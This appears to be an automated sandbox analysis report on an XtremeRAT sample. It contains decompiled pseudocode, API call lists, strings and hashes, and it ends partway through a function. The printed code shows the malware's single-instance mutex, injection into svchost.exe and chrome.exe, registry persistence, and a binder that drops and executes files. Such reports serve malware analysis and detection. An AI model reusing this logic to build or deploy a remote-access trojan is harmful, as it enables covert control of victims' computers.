					E10006234(_t219, _t244,  &_v5592, L"CONFIG", _t348, _t363);
					E100037AC(0x10012580, _v5592);
					E100050D8();
					_t225 =  *0x10012580; // 0x781fa4
					E100050D0(_t340, E1000390C(_t225));
				}
				if( *((intOrPtr*)(_t340 + 0x1388)) != 0x1e240) {
					SetFileAttributesW(_t244, 0x80);
					DeleteFileW(_t244);
					E100050D8();
					E100051E8(0,  &_v5040);
					memcpy(_t340,  &_v5040, 0x4e4 << 2);
					_t357 = _t357 + 0xc;
					_t340 = _t340;
					E10003BE4(0x10012580, 0x9c8);
					_t194 =  *0x10012580; // 0x781fa4
					E100050D0(E1000390C(_t194), _t340);
					_t197 =  *0x10012580; // 0x781fa4
					E10006234(_t197, _t244,  &_v5596, L"CONFIG",  &_v5040, 0);
					E100037AC(0x10012580, _v5596);
					E100050D8();
					_t203 =  *0x10012580; // 0x781fa4
					E100050D0(_t340, E1000390C(_t203));
				}
				_t41 = _t340 + 0xfaa; // 0x100107de
				_t124 = E10004DF0(0, 0, _t41); // executed
				_t245 = _t124;
				if(GetLastError() == 0xb7) {
					ExitProcess(0);
				}
				CloseHandle(_t245);
				if( *((char*)(_t340 + 0xfa8)) == 1) {
					_t43 = _t340 + 0x109e; // 0x100108d2
					_t170 = E10004DF0(0, 0, _t43); // executed
					_t245 = _t170;
					_t368 = GetLastError() - 0xb7;
					if(_t368 == 0) {
						CloseHandle(_t245);
					} else {
						CloseHandle(_t245);
						_t174 =  *0x1000e0f4; // 0x0
						_push(E1000391C(_t174) + _t175);
						_t177 =  *0x1000e0f4; // 0x0
						E100050D0(L"svchost.exe", E1000390C(_t177));
						E100098A8(E10009950(L"svchost.exe"), _t340, E1000C9D0);
					}
				}
				GetModuleFileNameW(0, L"C:\\Users\\hardz\\Desktop\\7FW4ce2RDy.exe", 0x20a);
				_t45 = _t340 + 0xbd2; // 0x10010406
				E100038E0( &_v5600, 0x3d, _t45);
				_t301 =  *0x1000e0f0; // 0x0
				E10003A34(_v5600, _t301);
				if(_t368 != 0) {
					_t48 = _t340 + 0xbd2; // 0x10010406
					E100038E0( &_v5604, 0x3d, _t48);
					_t303 =  *0x1000e0ec; // 0x0
					E10003A34(_v5604, _t303);
					if(__eflags != 0) {
						_t53 = _t340 + 0xbd2; // 0x10010406
						_t303 = _t53;
						E100050D0(L"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", _t53);
						_t349 = E10009950(L"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe");
					} else {
						E100054C4( &_v5572, __eflags);
						memcpy(L"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",  &_v5572, 0x82 << 2);
						asm("movsw");
						_t340 = _t340;
						_t349 = E10009950(L"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe");
					}
				} else {
					_t349 = 0;
				}
				 *0x10012370 = 0;
				if(_t349 != 0) {
					while(1) {
						_t304 = E1000C080;
						_t246 = E100098A8(_t349, L"C:\\Users\\hardz\\Desktop\\7FW4ce2RDy.exe", E1000C080);
						__eflags = _t246;
						if(_t246 == 0) {
							_t156 =  *0x1000e0fc; // 0x1000e000
							TerminateProcess(_t349,  *_t156);
							_t349 = E10009950(L"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe");
							Sleep(0x1f4);
						}
						 *0x10012370 =  *0x10012370 + 1;
						__eflags = _t246;
						if(_t246 != 0) {
							break;
						}
						__eflags =  *0x10012370 - 7;
						if( *0x10012370 < 7) {
							continue;
						}
						break;
					}
					E1000B78C(_t340, _t246, _t304, _t340, _t349); // executed
					__eflags = _t246;
					if(_t246 == 0) {
						_t152 =  *0x1000e0fc; // 0x1000e000
						TerminateProcess(_t349,  *_t152);
						E1000C080(_t246, _t340, _t349, L"C:\\Users\\hardz\\Desktop\\7FW4ce2RDy.exe");
					}
					goto L32;
				} else {
					E1000B78C(_t340, _t245, _t303, _t340, _t349);
					E1000C080(_t245, _t340, _t349, L"C:\\Users\\hardz\\Desktop\\7FW4ce2RDy.exe");
					L32:
					_pop(_t305);
					 *[fs:eax] = _t305;
					_push(0x1000d760);
					E10003788( &_v5604, 8);
					E10003788( &_v5048, 2);
					return E10003788( &_v32, 3);
				}
			}

0x1000d0f4
0x1000d0f5
0x1000d0f7
0x1000d0fc
0x1000d0fc
0x1000d0fe
0x1000d100
0x1000d100
0x1000d103
0x1000d10b
0x1000d117
0x1000d118
0x1000d11d
0x1000d120
0x1000d128
0x1000d12d
0x1000d132
0x1000d13a
0x1000d147
0x1000d154
0x1000d159
0x1000d160
0x1000d16d
0x1000d178
0x1000d18a
0x1000d191
0x1000d191
0x1000d19e
0x1000d1ab
0x1000d1b0
0x1000d1b7
0x1000d1b7
0x1000d1c3
0x1000d1d0
0x1000d1e1
0x1000d1e3
0x1000d1ee
0x1000d1f3
0x1000d204
0x1000d214
0x1000d219
0x1000d229
0x1000d235
0x1000d23a
0x1000d24d
0x1000d253
0x1000d25f
0x1000d25f
0x1000d261
0x1000d26c
0x1000d281
0x1000d28b
0x1000d296
0x1000d2b2
0x1000d2bd
0x1000d2d3
0x1000d2e3
0x1000d2fa
0x1000d360
0x1000d376
0x1000d37b
0x1000d381
0x1000d38d
0x1000d393
0x1000d398
0x1000d39d
0x1000d3a3
0x1000d3b2
0x1000d2fc
0x1000d302
0x1000d318
0x1000d31d
0x1000d323
0x1000d32e
0x1000d334
0x1000d339
0x1000d33e
0x1000d344
0x1000d353
0x1000d353
0x1000d3b7
0x1000d3c1
0x1000d3c5
0x1000d3ca
0x1000d3cc
0x1000d3d8
0x1000d3e9
0x1000d3ef
0x1000d3f5
0x1000d3fa
0x1000d41b
0x1000d420
0x1000d435
0x1000d445
0x1000d44a
0x1000d45a
0x1000d466
0x1000d46b
0x1000d47e
0x1000d47e
0x1000d48d
0x1000d499
0x1000d49f
0x1000d4ab
0x1000d4b8
0x1000d4c9
0x1000d4c9
0x1000d4cb
0x1000d4d6
0x1000d4db
0x1000d4ec
0x1000d4fc
0x1000d501
0x1000d511
0x1000d51d
0x1000d522
0x1000d535
0x1000d535
0x1000d53a
0x1000d545
0x1000d54a
0x1000d556
0x1000d55a
0x1000d55a
0x1000d560
0x1000d56c
0x1000d56e
0x1000d579
0x1000d57e
0x1000d585
0x1000d58a
0x1000d5d3
0x1000d58c
0x1000d58d
0x1000d592
0x1000d59e
0x1000d59f
0x1000d5b1
0x1000d5cb
0x1000d5cb
0x1000d58a
0x1000d5e4
0x1000d5ef
0x1000d5fa
0x1000d605
0x1000d60b
0x1000d610
0x1000d61c
0x1000d627
0x1000d632
0x1000d638
0x1000d63d
0x1000d66e
0x1000d66e
0x1000d67e
0x1000d68d
0x1000d63f
0x1000d645
0x1000d65b
0x1000d65d
0x1000d65f
0x1000d66a
0x1000d66a
0x1000d612
0x1000d612
0x1000d612
0x1000d691
0x1000d698
0x1000d6ad
0x1000d6b2
0x1000d6be
0x1000d6c0
0x1000d6c2
0x1000d6c4
0x1000d6cd
0x1000d6dc
0x1000d6e3
0x1000d6e3
0x1000d6e8
0x1000d6ee
0x1000d6f0
0x00000000
0x00000000
0x1000d6f2
0x1000d6f9
0x00000000
0x00000000
0x00000000
0x1000d6f9
0x1000d6fd
0x1000d702
0x1000d704
0x1000d706
0x1000d70f
0x1000d719
0x1000d719
0x00000000
0x1000d69a
0x1000d69c
0x1000d6a6
0x1000d71e
0x1000d720
0x1000d723
0x1000d726
0x1000d736
0x1000d746
0x1000d758
0x1000d758

APIs

SetErrorMode.KERNEL32(00008007,00000000,1000D759,?,?,?,?,00000000,00000000), ref: 1000D13A
ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 1000D18A
ExitProcess.KERNEL32(00000000,00000000,open,00000000,00000000,00000000,00000000,00008007,00000000,1000D759,?,?,?,?,00000000,00000000), ref: 1000D191
Sleep.KERNEL32(00001770,00008007,00000000,1000D759,?,?,?,?,00000000,00000000), ref: 1000D1B7
SHDeleteKeyW.SHLWAPI(80000001,00000000,00008007,00000000,1000D759,?,?,?,?,00000000,00000000), ref: 1000D281

Part of subcall function 1000577C: RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 100057C2
Part of subcall function 1000577C: RegSetValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,10005825,?,1000F834), ref: 100057EE
Part of subcall function 1000577C: RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,00000000,00000000,10005825,?,1000F834), ref: 100057FD

Part of subcall function 10005690: lstrlenW.KERNEL32(00000000,1000F834,1000F834,?,1000D2F8,00000002,?,80000001,00000000,00008007,00000000,1000D759), ref: 100056B7

SetFileAttributesW.KERNEL32(00000000,00000080,.cfg,?,?,00000002,?,80000001,00000000,00008007,00000000,1000D759), ref: 1000D3D8
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 1000D499
DeleteFileW.KERNEL32(00000000,00000000,00000080), ref: 1000D49F

Part of subcall function 10004DF0: CreateMutexW.KERNEL32(?,?,?,?,1000D54A,00000000,00000000,HgDdsuTd), ref: 10004E06

GetLastError.KERNEL32(00000000,00000000,HgDdsuTd), ref: 1000D54C
ExitProcess.KERNEL32(00000000,00000000,00000000,HgDdsuTd), ref: 1000D55A
CloseHandle.KERNEL32(00000000,00000000,00000000,HgDdsuTd), ref: 1000D560
GetLastError.KERNEL32(00000000,00000000,HgDdsuTdPERSIST,00000000,00000000,00000000,HgDdsuTd), ref: 1000D580
CloseHandle.KERNEL32(00000000,00000000,00000000,HgDdsuTdPERSIST,00000000,00000000,00000000,HgDdsuTd), ref: 1000D58D
CloseHandle.KERNEL32(00000000,00000000,00000000,HgDdsuTdPERSIST,00000000,00000000,00000000,HgDdsuTd), ref: 1000D5D3
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A,00000000,00000000,00000000,HgDdsuTd), ref: 1000D5E4
TerminateProcess.KERNEL32(00000000,00000000,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A,00000000,00000000,00000000,HgDdsuTd), ref: 1000D6CD
Sleep.KERNEL32(000001F4,00000000,00000000,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A,00000000,00000000,00000000,HgDdsuTd), ref: 1000D6E3
TerminateProcess.KERNEL32(00000000,00000000,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A,00000000,00000000,00000000,HgDdsuTd), ref: 1000D70F

Part of subcall function 100054C4: GetTempPathW.KERNEL32(00000104,?,1000F834,00000000,1000D64A,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A,00000000,00000000,00000000,HgDdsuTd), ref: 100054D4
Part of subcall function 100054C4: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,00000104,?,1000F834,00000000,1000D64A,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A,00000000), ref: 10005515
Part of subcall function 100054C4: CloseHandle.KERNEL32(00000000,?,40000000,00000002,00000000,00000002,00000080,00000000,00000104,?,1000F834,00000000,1000D64A,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A), ref: 1000551B
Part of subcall function 100054C4: FindExecutableW.SHELL32(?,00000000,?), ref: 10005528
Part of subcall function 100054C4: DeleteFileW.KERNEL32(?,00000000,?,40000000,00000002,00000000,00000002,00000080,00000000,00000104,?,1000F834,00000000,1000D64A,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe), ref: 1000552E

Part of subcall function 10009950: CreateProcessW.KERNEL32 ref: 1000999D
Part of subcall function 10009950: Sleep.KERNEL32(00000064,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?,1000F834,1000F834,00000000,1000D68D,00000000), ref: 100099AF

Strings

CONFIG, xrefs: 1000D20F, 1000D440, 1000D4F7
svchost.exe, xrefs: 1000D5AB, 1000D5B6
\Microsoft\Windows\, xrefs: 1000D2DE, 1000D323
Mutex, xrefs: 1000D2A3
C:\Program Files\Google\Chrome\Application\chrome.exe, xrefs: 1000D651, 1000D660, 1000D674, 1000D683, 1000D6D2
HgDdsuTd, xrefs: 1000D540
HgDdsuTdPERSIST, xrefs: 1000D574
update, xrefs: 1000D1A6
C:\Users\user\Desktop\7FW4ce2RDy.exe, xrefs: 1000D5DD, 1000D6A1, 1000D6AD, 1000D714
open, xrefs: 1000D183
.cfg, xrefs: 1000D344, 1000D3A3
SOFTWARE\XtremeRAT, xrefs: 1000D267, 1000D2A8
restart, xrefs: 1000D14F

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$CloseProcess$CreateHandle$DeleteErrorSleep$AttributesExitLastTerminate$ExecutableExecuteFindModeModuleMutexNamePathShellTempValuelstrlen
String ID: .cfg$C:\Program Files\Google\Chrome\Application\chrome.exe$C:\Users\user\Desktop\7FW4ce2RDy.exe$CONFIG$HgDdsuTd$HgDdsuTdPERSIST$Mutex$SOFTWARE\XtremeRAT$\Microsoft\Windows\$open$restart$svchost.exe$update
API String ID: 17641713-1360669444
Opcode ID: 098e3562cc71e91e86165adcb7c231f29123dbc9123391b6d7212fe8bb235743
Instruction ID: 7babdffad351a71ae314de662e95e98ead1dbb94228c143735747afee298a140
Opcode Fuzzy Hash: 098e3562cc71e91e86165adcb7c231f29123dbc9123391b6d7212fe8bb235743
Instruction Fuzzy Hash: E2E1B5787005559BF715E764CC82B9FB3AAEB803C0F508061F5489B29EEEB5FE418B61

Uniqueness

Uniqueness Score: -1.00%

Function 1000B78C, Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 309
fileCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E1000B78C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v1018;
				void _v5028;
				char _v5580;
				char _v5584;
				char _v5588;
				char _v5592;
				char _v5596;
				char _v5600;
				char _v5604;
				char _v5608;
				char _v5612;
				char _v5616;
				char _v5620;
				char _v5624;
				char _v5628;
				char _v5632;
				char _v5636;
				char _v5640;
				char _v5644;
				char _v5648;
				char _v5652;
				char _v5656;
				char _v5660;
				char _v5664;
				char _v5668;
				char _v5672;
				char _v5676;
				char _v5680;
				char _t138;
				char _t143;
				void* _t150;
				char _t158;
				char* _t233;
				void* _t234;
				void* _t248;
				void* _t250;
				void* _t252;
				void* _t254;
				void* _t258;
				void* _t262;
				intOrPtr _t267;
				intOrPtr _t284;
				void* _t285;
				short* _t314;
				short* _t316;
				void* _t318;
				void* _t319;

				_t318 = _t319;
				_t234 = 0x2c5;
				goto L1;
				L4:
				E10003A34(_v8, 0);
				if(0 == 0) {
					L29:
					_pop(_t267);
					 *[fs:eax] = _t267;
					_push(E1000BC64);
					E10003788( &_v5680, 0xf);
					E100032F0( &_v5620, 2);
					E10003788( &_v5612, 2);
					E100032F0( &_v5604, 2);
					E10003788( &_v5596, 4);
					return E10003788( &_v16, 3);
				} else {
					while(1) {
						E10003A34(_v8, 0);
						if(0 == 0) {
							goto L29;
						}
						E10003770( &_v16);
						E10003770( &_v12);
						E100050D8();
						E100050D0(_t233, E1000390C(_v8));
						E10003B04( &_v8, 0x228, 1, __eflags);
						E10003AB8(_v8, E10003FD4( *((intOrPtr*)(_t233 + 0x210)),  *((intOrPtr*)(_t233 + 0x214)), 2, 0), 1, __eflags,  &_v16);
						E10003B04( &_v8, E10003FD4( *((intOrPtr*)(_t233 + 0x210)),  *((intOrPtr*)(_t233 + 0x214)), 2, 0), 1, __eflags);
						__eflags =  *((char*)(_t233 + 0x220));
						if( *((char*)(_t233 + 0x220)) != 0) {
							L9:
							_t138 =  *((intOrPtr*)(_t233 + 0x218));
							__eflags = _t138;
							if(_t138 != 0) {
								__eflags = _t138 - 1;
								if(_t138 != 1) {
									__eflags = _t138 - 2;
									if(_t138 != 2) {
										__eflags = _t138 - 3;
										if(_t138 != 3) {
											__eflags = _t138 - 4;
											if(__eflags == 0) {
												E10005638( &_v5656, _t314, _t316);
												__eflags = 0;
												E10003A34(_v5656, 0);
												if(__eflags != 0) {
													E10005638( &_v5660, _t314, _t316);
													_push(_v5660);
													_push(E1000BCA4);
													E100038E0( &_v5664, 0x105, _t233);
													_push(_v5664);
													E100039EC();
												}
											}
										} else {
											E100038E0( &_v5648, 0x105, _t233);
											_push(_v5648);
											E10005324( &_v5652);
											_pop(_t248);
											E10003988( &_v12, _t248, _v5652, __eflags);
										}
									} else {
										E100038E0( &_v5640, 0x105, _t233);
										_push(_v5640);
										E10005460( &_v5644, _t233, 0x105, __eflags);
										_pop(_t250);
										E10003988( &_v12, _t250, _v5644, __eflags);
									}
								} else {
									E100038E0( &_v5632, 0x105, _t233);
									_push(_v5632);
									E100053D8( &_v5636, _t233, __eflags);
									_pop(_t252);
									E10003988( &_v12, _t252, _v5636, __eflags);
								}
							} else {
								E100038E0( &_v5624, 0x105, _t233);
								_push(_v5624);
								E10005350( &_v5628, _t233, __eflags);
								_pop(_t254);
								E10003988( &_v12, _t254, _v5628, __eflags);
							}
							E10003988( &_v5668, L".exe", _v12, __eflags);
							_t143 = E10005EB4(E1000390C(_v5668), L"OK", 4, 0); // executed
							__eflags = _t143;
							if(__eflags != 0) {
								_t284 = _v12;
								E10003988( &_v5680, L".xtr", _t284, __eflags);
								DeleteFileW(E1000390C(_v5680)); // executed
							} else {
								E10005324( &_v5672);
								_push(_v5672);
								_push(E1000BCA4);
								E100038E0( &_v5676, 0x105, _t233);
								_push(_v5676);
								_t284 = 3;
								E100039EC();
							}
							_t150 = E1000391C(_v16);
							asm("cdq");
							_push(_t284);
							_push(_t150 + _t150);
							_push(E1000390C(_v16));
							_t316 = E1000390C(_v12);
							_pop(_t285); // executed
							E10005EB4(_t316, _t285); // executed
							_t158 =  *((intOrPtr*)(_t233 + 0x21c));
							__eflags = _t158 - 2;
							if(_t158 != 2) {
								__eflags = _t158 - 1;
								if(_t158 != 1) {
									__eflags = _t158;
									if(_t158 == 0) {
										ShellExecuteW(0, L"open", _t316, 0, 0, 1); // executed
									}
								} else {
									ShellExecuteW(0, L"open", _t316, 0, 0, 0);
								}
							}
							continue;
						}
						_push(0);
						_push( &_v5588);
						E100038E0( &_v5592, 0x105, _t233);
						_push(_v5592);
						E100034B0( &_v5604, 0x3d,  &_v1018);
						E1000352C( &_v5600, _v5604, "SOFTWARE\\");
						E100038FC( &_v5596, _v5600);
						_pop(_t258);
						E1000553C(0x80000001, _t233, _t258, _v5596, _t316);
						E10003A34(_v5588, E1000BC98);
						if(__eflags == 0) {
							continue;
						} else {
							_push(E1000BC98);
							_push(2);
							E100038E0( &_v5608, 0x105, _t233);
							_push(_v5608);
							E100034B0( &_v5620, 0x3d,  &_v1018);
							E1000352C( &_v5616, _v5620, "SOFTWARE\\");
							E100038FC( &_v5612, _v5616);
							_pop(_t262);
							E1000577C(0x80000001, _t233, _t262, _v5612, _t316, __eflags);
							goto L9;
						}
					}
					goto L29;
				}
				L1:
				_push(0);
				_push(0);
				_t234 = _t234 - 1;
				if(_t234 != 0) {
					goto L1;
				} else {
					_push(_t234);
					_t316 = __eax;
					memcpy( &_v5028, __eax, 0x4e4 << 2);
					_t314 =  &(_t316[0x4e4]);
					_t233 =  &_v5580;
					_push(_t318);
					_push(0x1000bc5d);
					_push( *[fs:eax]);
					 *[fs:eax] = _t319 + 0xc;
					E1000B700( &_v8);
					E10003A34(_v8, 0);
					if(0 != 0) {
						E10006404(_v8, _t233,  &_v5584, L"BINDER", _t316, 0);
						E100037D0( &_v8, _v5584);
					}
					goto L4;
				}
			}

0x1000b78d
0x1000b78f
0x1000b78f
0x1000b7f7
0x1000b7fc
0x1000b801
0x1000bbf2
0x1000bbf4
0x1000bbf7
0x1000bbfa
0x1000bc0a
0x1000bc1a
0x1000bc2a
0x1000bc3a
0x1000bc4a
0x1000bc5c
0x1000b807
0x1000bbe2
0x1000bbe7
0x1000bbec
0x00000000
0x00000000
0x1000b80f
0x1000b817
0x1000b823
0x1000b839
0x1000b84b
0x1000b873
0x1000b897
0x1000b89c
0x1000b8a3
0x1000b99d
0x1000b99d
0x1000b9a3
0x1000b9a5
0x1000b9df
0x1000b9e2
0x1000ba1c
0x1000ba1f
0x1000ba59
0x1000ba5c
0x1000ba93
0x1000ba96
0x1000ba9e
0x1000baa9
0x1000baab
0x1000bab0
0x1000bab8
0x1000babd
0x1000bac3
0x1000bad5
0x1000bada
0x1000bae8
0x1000bae8
0x1000bab0
0x1000ba5e
0x1000ba6b
0x1000ba76
0x1000ba7d
0x1000ba8b
0x1000ba8c
0x1000ba8c
0x1000ba21
0x1000ba2e
0x1000ba39
0x1000ba40
0x1000ba4e
0x1000ba4f
0x1000ba4f
0x1000b9e4
0x1000b9f1
0x1000b9fc
0x1000ba03
0x1000ba11
0x1000ba12
0x1000ba12
0x1000b9a7
0x1000b9b4
0x1000b9bf
0x1000b9c6
0x1000b9d4
0x1000b9d5
0x1000b9d5
0x1000baff
0x1000bb14
0x1000bb19
0x1000bb1b
0x1000bb65
0x1000bb68
0x1000bb79
0x1000bb1d
0x1000bb23
0x1000bb28
0x1000bb2e
0x1000bb40
0x1000bb45
0x1000bb4e
0x1000bb53
0x1000bb53
0x1000bb81
0x1000bb88
0x1000bb89
0x1000bb8a
0x1000bb93
0x1000bb9c
0x1000bba0
0x1000bba1
0x1000bba6
0x1000bbac
0x1000bbaf
0x1000bbb1
0x1000bbb4
0x1000bbcb
0x1000bbcd
0x1000bbdd
0x1000bbdd
0x1000bbb6
0x1000bbc4
0x1000bbc4
0x1000bbb4
0x00000000
0x1000bbaf
0x1000b8a9
0x1000b8b1
0x1000b8bf
0x1000b8ca
0x1000b8dc
0x1000b8f2
0x1000b903
0x1000b913
0x1000b914
0x1000b924
0x1000b929
0x00000000
0x1000b92f
0x1000b92f
0x1000b934
0x1000b943
0x1000b94e
0x1000b960
0x1000b976
0x1000b987
0x1000b997
0x1000b998
0x00000000
0x1000b998
0x1000b929
0x00000000
0x1000bbe2
0x1000b794
0x1000b794
0x1000b796
0x1000b798
0x1000b799
0x00000000
0x1000b79b
0x1000b79b
0x1000b79f
0x1000b7ac
0x1000b7ac
0x1000b7ae
0x1000b7b6
0x1000b7b7
0x1000b7bc
0x1000b7bf
0x1000b7c5
0x1000b7cf
0x1000b7d4
0x1000b7e4
0x1000b7f2
0x1000b7f2
0x00000000
0x1000b7d4

APIs

Part of subcall function 10003770: SysFreeString.OLEAUT32(1000CFDC), ref: 1000377E

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 1000BBC4

Part of subcall function 1000553C: RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000001,?,00000000,10005628,?,1000F834,?), ref: 10005591
Part of subcall function 1000553C: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,10005628,?,1000F834,?), ref: 100055B5
Part of subcall function 1000553C: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001), ref: 100055E6
Part of subcall function 1000553C: RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,10005628,?,1000F834), ref: 10005600

Part of subcall function 1000577C: RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 100057C2
Part of subcall function 1000577C: RegSetValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,10005825,?,1000F834), ref: 100057EE
Part of subcall function 1000577C: RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,00000000,00000000,10005825,?,1000F834), ref: 100057FD

DeleteFileW.KERNEL32(00000000,00000004,00000000,00000002,00000000,00000002,00000000,?,00000000,1000BC5D,?,1000F834,00000000,00000000,000002C4,00000000), ref: 1000BB79
ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 1000BBDD

Part of subcall function 100053D8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 10005406

Strings

.xtr, xrefs: 1000BB60
open, xrefs: 1000BBBD, 1000BBD6
SOFTWARE\, xrefs: 1000B8ED, 1000B971
.exe, xrefs: 1000BAF7
BINDER, xrefs: 1000B7DC

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Value$CloseExecuteQueryShell$CreateDeleteDirectoryFileFreeOpenStringSystem
String ID: .exe$.xtr$BINDER$SOFTWARE\$open
API String ID: 3529233218-3085899294
Opcode ID: 0a22a47b740f272aa9815302f1ca917ca28341e751ca6317fe122055c7ff1c0c
Instruction ID: e2e431fa4438d6138b358157023902ea7bce804184865157e4dc89de6df5abab
Opcode Fuzzy Hash: 0a22a47b740f272aa9815302f1ca917ca28341e751ca6317fe122055c7ff1c0c
Instruction Fuzzy Hash: 33C11C38A005199BFB25DB54CC82BCFB3B9EB84381F5080B5B509AB249DE75FE858F51

Uniqueness

Uniqueness Score: -1.00%

Function 100054BC, Relevance: 7.5, APIs: 5, Instructions: 43
fileCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E100054BC(intOrPtr* __eax, void* __ebx, void* __edx) {
				short _v528;
				short* _t9;
				signed int _t10;
				intOrPtr _t11;
				intOrPtr _t14;
				void* _t19;
				int _t23;
				void* _t33;
				WCHAR* _t34;

				_t9 = __eax +  *__eax;
				 *_t9 = _t9 +  *_t9;
				_pop(_t33);
				 *_t9 = _t9 +  *_t9;
				 *((intOrPtr*)(__ebx + 0x56)) =  *((intOrPtr*)(__ebx + 0x56)) + __edx;
				_push(__ebx);
				_t34 = _t33 + 0xfffffdf4;
				_t10 = GetTempPathW(0x104, _t34);
				_t11 =  *0x1000e0ac; // 0x0
				_push(E1000391C(_t11) + _t12);
				_t14 =  *0x1000e0ac; // 0x0
				E100050D0(_t34 + 4 + _t10 * 2, E1000390C(_t14));
				_t19 = CreateFileW( &_v528, 0x40000000, 2, 0, 2, 0x80, 0); // executed
				CloseHandle(_t19);
				FindExecutableW( &_v528, 0, _t9); // executed
				_t23 = DeleteFileW(_t34); // executed
				return _t23;
			}

0x100054bc
0x100054be
0x100054c0
0x100054c1
0x100054c3
0x100054c4
0x100054c6
0x100054d4
0x100054db
0x100054e7
0x100054e8
0x100054f9
0x10005515
0x1000551b
0x10005528
0x1000552e
0x1000553b

APIs

GetTempPathW.KERNEL32(00000104,?,1000F834,00000000,1000D64A,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A,00000000,00000000,00000000,HgDdsuTd), ref: 100054D4
CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,00000104,?,1000F834,00000000,1000D64A,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A,00000000), ref: 10005515
CloseHandle.KERNEL32(00000000,?,40000000,00000002,00000000,00000002,00000080,00000000,00000104,?,1000F834,00000000,1000D64A,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A), ref: 1000551B
FindExecutableW.SHELL32(?,00000000,?), ref: 10005528
DeleteFileW.KERNEL32(?,00000000,?,40000000,00000002,00000000,00000002,00000080,00000000,00000104,?,1000F834,00000000,1000D64A,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe), ref: 1000552E

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$CloseCreateDeleteExecutableFindHandlePathTemp
String ID:
API String ID: 3048815070-0
Opcode ID: 684a10809eaa70b2404493bbaa18f3f048d77b0755fa25e4f9c2802281bd8911
Instruction ID: 3ea9f2177f4edda36d5c03afde6c78b2b523ab1dccb69f8e5379325d0c4c700b
Opcode Fuzzy Hash: 684a10809eaa70b2404493bbaa18f3f048d77b0755fa25e4f9c2802281bd8911
Instruction Fuzzy Hash: B9F0A4B56453806FF311D7B4EC87FCB3B98CB01390F154462B240EA1EBEDA0B80483AA

Uniqueness

Uniqueness Score: -1.00%

Function 100054C4, Relevance: 7.5, APIs: 5, Instructions: 40
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E100054C4(short* __eax, void* __eflags) {
				short _v532;
				signed int _t7;
				intOrPtr _t8;
				intOrPtr _t11;
